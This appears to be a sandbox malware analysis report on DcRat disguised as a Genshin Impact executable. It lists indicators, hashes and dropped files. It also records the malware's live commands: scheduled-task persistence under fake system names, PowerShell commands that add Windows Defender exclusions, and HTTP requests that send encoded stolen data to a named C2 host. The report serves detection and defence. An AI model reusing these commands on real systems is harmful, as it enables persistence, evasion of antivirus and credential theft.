File name:

Genshin Impact.exe

Full analysis: https://app.any.run/tasks/b96f80ce-2088-462b-86e3-d1001ce956ae
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Malware Trends Tracker     >>>
Analysis date: February 15, 2024, 03:03:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
dcrat
rat
backdoor
remote
stealer
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

B4BB269011C062CB169969258AB0E1B9

SHA1:

6F17B1266EABFAD46EEE405F8245C604468A52C5

SHA256:

BD1D4E5E6380D4E4C398B3BD1F3BFC20FFA576C004773B1F637FD272B771C125

SSDEEP:

49152:ZFrKj5GTlv6xRC6cVUSAWuLhg1BEz3pkJTXVbgRdhmq/ZicwR9Jjx6SlzBlqTRtW:ZFrKdQ+RXlWENYTXVbe/ZicwR9tx62B3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • Genshin Impact.exe (PID: 3216)
      • PortwebSaves.exe (PID: 120)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 2964)

    • Adds path to the Windows Defender exclusion list

      • PortwebSaves.exe (PID: 120)

    • DCRAT has been detected (YARA)

      • lsass.exe (PID: 3876)

    • Steals credentials from Web Browsers

      • lsass.exe (PID: 3876)

    • Connects to the CnC server

      • lsass.exe (PID: 3876)

    • Steals credentials

      • lsass.exe (PID: 3876)

    • DCRAT has been detected (SURICATA)

      • lsass.exe (PID: 3876)

    • Actions looks like stealing of personal data

      • lsass.exe (PID: 3876)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2964)
      • PortwebSaves.exe (PID: 120)

    • Reads security settings of Internet Explorer

      • Genshin Impact.exe (PID: 3216)
      • PortwebSaves.exe (PID: 120)

    • Reads the Internet Settings

      • wscript.exe (PID: 2964)
      • Genshin Impact.exe (PID: 3216)
      • PortwebSaves.exe (PID: 120)
      • powershell.exe (PID: 980)
      • powershell.exe (PID: 880)
      • powershell.exe (PID: 2888)
      • powershell.exe (PID: 2240)
      • lsass.exe (PID: 3876)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 1308)
      • powershell.exe (PID: 2724)
      • powershell.exe (PID: 2100)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2964)

    • Executable content was dropped or overwritten

      • Genshin Impact.exe (PID: 3216)
      • PortwebSaves.exe (PID: 120)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 2964)
      • PortwebSaves.exe (PID: 120)

    • The process creates files with name similar to system file names

      • PortwebSaves.exe (PID: 120)

    • Executed via WMI

      • schtasks.exe (PID: 4044)
      • schtasks.exe (PID: 2792)
      • schtasks.exe (PID: 2896)
      • schtasks.exe (PID: 2208)
      • schtasks.exe (PID: 956)
      • schtasks.exe (PID: 3684)
      • schtasks.exe (PID: 2168)
      • schtasks.exe (PID: 2064)
      • schtasks.exe (PID: 2960)
      • schtasks.exe (PID: 848)
      • schtasks.exe (PID: 2184)
      • schtasks.exe (PID: 1644)
      • schtasks.exe (PID: 2148)
      • schtasks.exe (PID: 3776)
      • schtasks.exe (PID: 2644)
      • schtasks.exe (PID: 1860)
      • schtasks.exe (PID: 2292)
      • schtasks.exe (PID: 1236)
      • schtasks.exe (PID: 1808)
      • schtasks.exe (PID: 1112)
      • schtasks.exe (PID: 696)

    • Checks for external IP

      • PortwebSaves.exe (PID: 120)
      • lsass.exe (PID: 3876)

    • Starts POWERSHELL.EXE for commands execution

      • PortwebSaves.exe (PID: 120)

    • Script adds exclusion path to Windows Defender

      • PortwebSaves.exe (PID: 120)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 3556)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 880)
      • powershell.exe (PID: 980)
      • powershell.exe (PID: 2240)
      • powershell.exe (PID: 2100)
      • powershell.exe (PID: 2888)
      • powershell.exe (PID: 2724)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 1308)

    • Reads browser cookies

      • lsass.exe (PID: 3876)

    • Loads DLL from Mozilla Firefox

      • lsass.exe (PID: 3876)

  • INFO

    • Reads the computer name

      • Genshin Impact.exe (PID: 3216)
      • PortwebSaves.exe (PID: 120)
      • lsass.exe (PID: 3876)

    • Checks supported languages

      • Genshin Impact.exe (PID: 3216)
      • PortwebSaves.exe (PID: 120)
      • lsass.exe (PID: 3876)

    • Reads the machine GUID from the registry

      • PortwebSaves.exe (PID: 120)
      • lsass.exe (PID: 3876)

    • Reads Environment values

      • PortwebSaves.exe (PID: 120)
      • lsass.exe (PID: 3876)

    • Reads product name

      • PortwebSaves.exe (PID: 120)
      • lsass.exe (PID: 3876)

    • Creates files in the program directory

      • PortwebSaves.exe (PID: 120)

    • Create files in a temporary directory

      • PortwebSaves.exe (PID: 120)
      • lsass.exe (PID: 3876)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

DcRat

(PID) Process(3876) lsass.exe
C2 (1)http://7777.cllt.nyashteam.ru/@wdHdzVGd
Options
MutexDCR_MUTEX-GJjaPoiuexaRW21vE3FV
savebrowsersdatatosinglefilefalse
ignorepartiallyemptydatafalse
cookiestrue
passwordstrue
formstrue
cctrue
historyfalse
telegramtrue
steamtrue
discordtrue
filezillatrue
screenshottrue
clipboardtrue
sysinfotrue
searchpath%UsersFolder% - Fast
Targetru
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 114176
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
86
Monitored processes
37
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start genshin impact.exe wscript.exe no specs cmd.exe no specs portwebsaves.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs w32tm.exe no specs #DCRAT lsass.exe genshin impact.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
120"C:\winsessionnet\PortwebSaves.exe"C:\winsessionnet\PortwebSaves.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
1.1.1o
Modules
Images
c:\winsessionnet\portwebsaves.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
696schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\csrss.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
848schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\winsessionnet\audiodg.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
880"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\PortwebSaves.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePortwebSaves.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
956schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winsessionnet\lsass.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
980"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\audiodg.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePortwebSaves.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1112schtasks.exe /create /tn "PortwebSavesP" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\PortwebSaves.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1236schtasks.exe /create /tn "PortwebSaves" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\PortwebSaves.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1308"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\lsass.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePortwebSaves.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1336"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\ReadyBoot\csrss.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePortwebSaves.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
21 708
Read events
21 595
Write events
113
Delete events
0

Modification events

(PID) Process:(3216) Genshin Impact.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3216) Genshin Impact.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3216) Genshin Impact.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3216) Genshin Impact.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2964) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2964) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2964) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2964) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(120) PortwebSaves.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PortwebSaves_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(120) PortwebSaves.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PortwebSaves_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
7
Suspicious files
42
Text files
10
Unknown types
5

Dropped files

PID
Process
Filename
Type
120PortwebSaves.exeC:\winsessionnet\lsass.exeexecutable
MD5:AD823965FDA5D6901AB6A2BC0E153CEE
SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9
120PortwebSaves.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\SearchFilterHost.exeexecutable
MD5:AD823965FDA5D6901AB6A2BC0E153CEE
SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9
120PortwebSaves.exeC:\Windows\Prefetch\ReadyBoot\csrss.exeexecutable
MD5:AD823965FDA5D6901AB6A2BC0E153CEE
SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9
120PortwebSaves.exeC:\Program Files\PackageManagement\ProviderAssemblies\69ddcba757bf72text
MD5:533EC4083ABE557183FB9118500F2012
SHA256:BD559755F7E9B504DD1260A3545AEC15C7165A45DC1A70335B470724D971BC81
120PortwebSaves.exeC:\Program Files\PackageManagement\ProviderAssemblies\smss.exeexecutable
MD5:AD823965FDA5D6901AB6A2BC0E153CEE
SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9
120PortwebSaves.exeC:\winsessionnet\audiodg.exeexecutable
MD5:AD823965FDA5D6901AB6A2BC0E153CEE
SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9
120PortwebSaves.exeC:\winsessionnet\42af1c969fbb7btext
MD5:5F39B156AD2ED63080CBFD6567ECD6DD
SHA256:FD52455C4EE702202808450010856399A465EC8BDC0B080D8181E30F9B687D7F
3216Genshin Impact.exeC:\winsessionnet\qmazbV2JlRldI.vbebinary
MD5:C976ABE88C50259F846E4A7F9219C0E4
SHA256:C912DE4503819861B8F5053C4DA777A73279ABA052F9D4710CDB9FACD62304D7
120PortwebSaves.exeC:\Windows\Migration\WTR\PortwebSaves.exeexecutable
MD5:AD823965FDA5D6901AB6A2BC0E153CEE
SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9
3216Genshin Impact.exeC:\winsessionnet\PortwebSaves.exeexecutable
MD5:AD823965FDA5D6901AB6A2BC0E153CEE
SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
35
TCP/UDP connections
8
DNS requests
2
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
120
PortwebSaves.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
text
6 b
unknown
3876
lsass.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
text
6 b
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?6bPhi3SxOdYE8hsiboB3F=wIY7vUbsmDZqqYHJQW1NgxK6Jy&cc94e78e3bda1f2269b01e133898fb04=e7fe83161c56c764f6c8620d4945ebb8&fdb24f392670a7714ac24c8e7509952b=QYycjMzMWN3UGZlNjYjFTOkdTNjNTYhhjZhNmY0EDM1AjN1EjZjZjM&6bPhi3SxOdYE8hsiboB3F=wIY7vUbsmDZqqYHJQW1NgxK6Jy
unknown
text
2.09 Kb
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W
unknown
text
104 b
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&4a4a8831cb4723c7f5e3b65ea3eefbf9=0VfiIiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiIyAjYxQmMwIDO4ITNwQWOhJWN3IGZ4EmNmdTZjhjMmRGMxcjN1gDNyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W
unknown
text
2.09 Kb
unknown
3876
lsass.exe
GET
200
104.21.2.8:80
http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&e742462fe5d2ee0b9bfd69cf1aa9c77a=d1nIw4WSwYVbiVXOXFmeOhlW6VzVhNDeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS6ljMaBnSIpFaKNDWzZ1VhlnSXllbKl2TplEWapnVWJGaWdEZUp0QMNHeXRWdwpWSuVzVZ1UMXlFbSNTVpdXaJRnRXpFMONDT6Z1RiBnWHlEdG12YulTbjdXOp9kaKl2Tpd2RkhmQWJGaWdEZUp0QMl2a5JGcSdFZCJUeOVzY5FlQClXYsJFSihmVtV1bBlmYKJ0UaVHbHRVd4x2YjlzVhtmVYF1ZjR1Tu1UVRd2cXpFM4dVWspkRLdWVtJmdod0Y2p0MZBXMrlkNJl3YsVjMi9mQzIWeOdVYOp0QMlWSp9UaNhlYo5UbZxGZsl0cJlmYjpESYh3aWFVTCFTVKJVRYNWNDh1Y4ZEWp9maJpXNXpFbKNTWUp0QMlGNyQmd1ITY1ZFbJZTSDVlS1UVUNp0QMlWSwI1ZNpWS2k0UUJkSsl0cJlmYzkTbiJXNXZVavpWSzh3VZNjVtNGcatWSzlUaiNTOtJmc1clVp9maJpnVuNGcahVYwUzVRl2dplEeBNFTnF0QU1kVFJVavpWS1lzVhpnSYp1VOFDVKp0aJNXS5VFUstWUnBzVaBjTYVGVCNEZzZFWZ1mVHJVavpWSsFzVZ9kTxQlSKtWSzlUaiNTOtJmc1clVp9maJVEbFpVeGJjYppEWa9mUzImTKNETpRjMkZXNyEWdWxWS2kUajxmSYRGMOdVWtZlbihWMFpVeGJjYppEWa9mUzImTKNETpRjMkZXNyEWdWxWS2k0UaRnRtR1aKhVW2pUbjxGaHRmdxsWSzl0UNlnVHJ2c502YwUjMiRUOXp1as1mVp9maJtGbVplas1GZsJVVWFFZrl0cJNVU2RzaJZTSTpFMG1WVv5EWalnWXp1UohVWOZlRVhkSDxUaFBDTPpUaPlGNyIGcSh0Ywp0MZpnVHJFbSJjYOlzVatGbtZlVCFjUpdXaJJUOpRVavpWS1o0MiRnVXRldWdkWwplVWFFZrl0cJNVU2RzaJZTSpNmdONzYs5kMilnQxIGbSdVYXZlRVhkSDxUaVpWS2k0UalnVIRmaWdEZwhmMZlnRwIGbSdVYXZlRVhkSDxUaJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMlWTUJlMBRlT3FERNdkWrF1RKV0TzEkaJZTSDplSKNjY65EWapWOtNWUWZUVEp0QMlWQUZVUOtWS2k0QapkVykFcahlWFZlRVRkSDx0MnRlT69maJVXOXFmes1GZspkVWFlTrl0cJlWZJFTRJBTRU1keJl2TpF1VaxmQzUlcOJjYz5URkVnVtNWeWNTUWJUMRl2dplkQ5kGVp9maJtmVXp1dOFTYqlzRiREeXlVdKhlWwgGWSZlQxEVa3lWSDxmMTdWQqlkNJNlW2wmMVxGaykFaOBTTNZlRVRkSDxUaFBDTPpUaPlWVtVGcOZlWv50VZRkSERlVCFTUpdXaJVTSp9UaV12YxI1MZxmUYF2bO12YCZlRVRkSDxEMvpWS6p0MipnTYpla502YRh3VZpGbyold4VlVR50aJNXUq9UaNhlW5ljMRZlQxEVa3lWS6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZulkNJlmY2x2RkdHbtNmaOhlWFZlRVRkSDxUavh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiIyAjYxQmMwIDO4ITNwQWOhJWN3IGZ4EmNmdTZjhjMmRGMxcjN1gDNyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikz